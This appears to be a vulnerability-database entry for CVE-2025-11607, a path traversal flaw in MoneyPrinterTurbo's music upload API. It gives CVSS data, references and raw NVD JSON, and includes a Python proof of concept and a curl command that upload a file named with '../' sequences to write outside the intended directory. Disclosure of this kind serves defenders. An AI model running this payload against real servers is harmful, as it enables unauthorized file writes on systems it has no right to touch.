CVE-2025-11607

Description

A weakness has been identified in harry0703 MoneyPrinterTurbo up to 1.2.6. The impacted element is the function upload_music of the file app/controllers/v1/music.py of the component API Endpoint. Executing a manipulation of the argument File can lead to path traversal. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:harry0703:moneyprinterturbo:*:*:*:*:*:*:*:* - VULNERABLE

MoneyPrinterTurbo <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11607 - MoneyPrinterTurbo Path Traversal PoC
# Vulnerability: Path Traversal in upload_music function (app/controllers/v1/music.py)
# Affected: MoneyPrinterTurbo <= 1.2.6

import requests

# Target configuration
TARGET_URL = "http://target:8080"
AUTH_TOKEN = "your_low_privilege_token_here"

# Step 1: Authenticate and obtain session (if needed)
session = requests.Session()

# Step 2: Prepare the malicious file upload with path traversal payload
# The File parameter is manipulated to traverse directories
malicious_filename = "../../../../tmp/evil_file.txt"

# Craft the multipart form data with traversal filename
files = {
    "file": (malicious_filename, b"malicious content payload", "audio/mpeg")
}

# Step 3: Send the request to the vulnerable upload_music endpoint
headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
}

upload_url = f"{TARGET_URL}/api/v1/music/upload"
response = session.post(upload_url, files=files, headers=headers)

# Step 4: Check the response
if response.status_code == 200:
    print(f"[+] Path traversal successful! File written to: {malicious_filename}")
    print(f"[+] Response: {response.text}")
else:
    print(f"[-] Upload failed with status code: {response.status_code}")
    print(f"[-] Response: {response.text}")

# Alternative: Using curl command
# curl -X POST "http://target:8080/api/v1/music/upload" \
#   -H "Authorization: Bearer YOUR_TOKEN" \
#   -F "file=@local_file.mp3;filename=../../../../tmp/evil_file.txt"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11607/
[4] VulDB https://vuldb.com/cve/CVE-2025-11607
[5] https://vuldb.com/?ctiid.327929
[6] https://vuldb.com/?id.327929
[7] https://vuldb.com/?submit.672550
[8] https://www.notion.so/Arbitrary-File-Write-Vulnerability-in-MoneyPrinterTurbo-1-2-6-288014c4d9ca809bb411e4fe875d1e22
[9] https://www.notion.so/Arbitrary-File-Write-Vulnerability-in-MoneyPrinterTurbo-1-2-6-288014c4d9ca809bb411e4fe875d1e22

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11607", "sourceIdentifier": "[email protected]", "published": "2025-10-11T17:15:37.513", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in harry0703 MoneyPrinterTurbo up to 1.2.6. The impacted element is the function upload_music of the file app/controllers/v1/music.py of the component API Endpoint. Executing a manipulation of the argument File can lead to path traversal. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:harry0703:moneyprinterturbo:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.6", "matchCriteriaId": "996FCD58-2276-45A5-A7DA-B7E3BB897B4E"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327929", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327929", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672550", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.notion.so/Arbitrary-File-Write-Vulnerability-in-MoneyPrinterTurbo-1-2-6-288014c4d9ca809bb411e4fe875d1e22", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.notion.so/Arbitrary-File-Write-Vulnerability-in-MoneyPrinterTurbo-1-2-6-288014c4d9ca809bb411e4fe875d1e22", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Permissions Required"]}]}}